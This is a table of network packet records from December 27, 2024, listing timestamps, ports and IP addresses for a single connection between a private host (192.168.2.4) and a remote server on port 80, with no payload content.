Dec 27, 2024 06:22:12.397600889 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.397665024 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.399893999 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.399991989 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.400000095 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.402219057 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.402338982 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.402390957 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.404537916 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.404609919 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.404650927 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.406842947 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.406898022 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.406975985 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.409207106 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.409243107 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.409312963 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.411479950 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.411535025 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.411601067 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.486449003 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.486510038 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.486557961 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.487344980 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.487416983 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.487785101 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.487838984 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.487914085 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.489636898 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.489756107 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.489814997 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.491138935 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.491281033 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.491348028 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.493052959 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.493163109 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.493331909 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.494968891 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.495079994 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.495167971 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.496797085 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.496923923 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.496980906 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.498651028 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.498814106 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.498873949 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.500469923 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.500587940 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.500667095 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.502233028 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.502315044 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.502372980 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.503957987 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.504010916 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.504090071 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.505670071 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.505791903 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.505851030 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:12.507354021 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:12.673970938 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:13.595421076 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:13.715167046 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.077255011 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.078093052 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.197865963 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.432019949 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.432064056 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.432121038 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.432538033 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.432609081 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.432663918 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.433554888 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.433676004 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.433731079 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.434716940 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.434770107 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.434818983 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.435837030 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.435925961 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.435981035 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.436935902 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.437078953 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.437131882 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.438060045 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.438178062 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.438239098 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.439202070 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.439337969 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.439395905 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.440304995 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.440408945 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.440473080 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.441438913 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.441550016 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.441607952 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.442572117 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.442742109 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.442801952 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.443694115 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.443856001 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.443931103 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.444833994 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.444964886 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.445019960 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.445955992 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.446089029 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.446147919 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.447069883 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.447199106 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.447261095 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.448440075 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.448496103 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.448556900 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.449352980 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.449467897 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.449532032 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.450500965 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.450581074 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.450643063 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.451625109 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.451731920 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.451788902 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.452730894 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.452850103 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.452905893 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.453866005 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.453958035 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.454025030 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.454988956 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.455101967 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.455158949 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.456104994 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.456231117 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.456284046 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.457237005 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.457375050 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.457432032 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.458336115 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.458456993 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.458522081 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.459480047 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.459682941 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.459739923 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.460611105 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.460726976 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.460783005 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.461862087 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.462011099 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.462066889 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.462847948 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.463009119 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.463073969 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.463985920 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.464127064 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.464196920 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.465125084 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.465265036 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.465317965 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.466243982 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.466382027 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.466445923 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.467364073 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.467493057 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.467562914 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.468486071 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.468626976 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.468679905 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.469605923 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.469746113 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.469796896 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.470742941 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.470868111 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.470942974 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.471863985 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.472002029 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.472057104 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.472996950 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.473102093 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.473162889 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.474119902 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.474253893 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.474299908 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.475385904 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.475505114 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.475555897 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.476371050 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.476540089 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.476593971 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.477497101 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.477602959 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.477657080 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.478647947 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.478758097 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.478835106 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.479759932 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.479861975 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.479932070 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.480882883 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.481026888 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.481077909 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.481996059 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.482145071 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.482203960 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.483144045 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.483328104 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.483375072 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.484261036 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.484390020 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.484441042 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.485393047 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.485485077 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.485531092 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.486500025 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.486630917 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.486675978 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.487633944 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.487737894 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.487787962 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.488765001 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.488873005 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.488918066 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.489903927 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.489993095 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.490037918 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.490998983 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.491101980 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.491147995 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.492085934 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.533337116 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.633268118 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.633371115 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.633451939 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.633820057 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.633980036 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.634036064 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.634073019 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.635133028 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.635198116 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.635225058 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.636230946 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.636287928 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.636324883 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.637353897 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.637408972 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.637471914 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.638472080 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.638528109 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.638611078 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.639585018 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.639641047 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.639693975 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.640734911 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.640801907 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.640868902 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.641858101 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.641911983 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.641979933 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.642982960 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.643037081 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.643106937 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.644109011 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.644166946 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.644395113 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.645261049 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.645348072 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.645365953 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.646369934 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.646420956 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.646496058 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.647494078 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.647551060 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.647588968 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.648639917 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.648694992 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.648773909 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.649758101 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.649828911 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.649862051 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.650870085 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.650928020 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.651014090 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.651988029 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.652048111 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.652117968 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.653132915 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.653183937 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.653243065 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.654275894 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.654344082 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.654386044 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.655378103 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.655431032 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.655513048 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.656547070 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.656601906 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.656686068 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.657610893 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.657665014 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.657746077 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.658754110 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.658807993 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.658893108 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.659882069 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.659933090 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.660016060 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.661007881 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.661076069 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.661170959 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.662137032 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.662189960 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.662280083 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.663273096 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.663341999 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.663456917 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.664396048 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.664444923 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.664544106 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.665524006 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.665587902 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.665671110 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.666651011 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.666706085 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.666754961 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.667800903 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.667853117 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.668015003 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.668906927 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.668967962 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.669035912 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.670028925 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.670074940 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.670145035 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.671159983 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.671207905 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.671257973 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.672278881 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.672333956 CET	49730	80	192.168.2.4	104.21.22.88
Dec 27, 2024 06:22:14.672404051 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.673403978 CET	80	49730	104.21.22.88	192.168.2.4
Dec 27, 2024 06:22:14.673506021 CET	49730	80	192.168.2.4	104.21.22.88
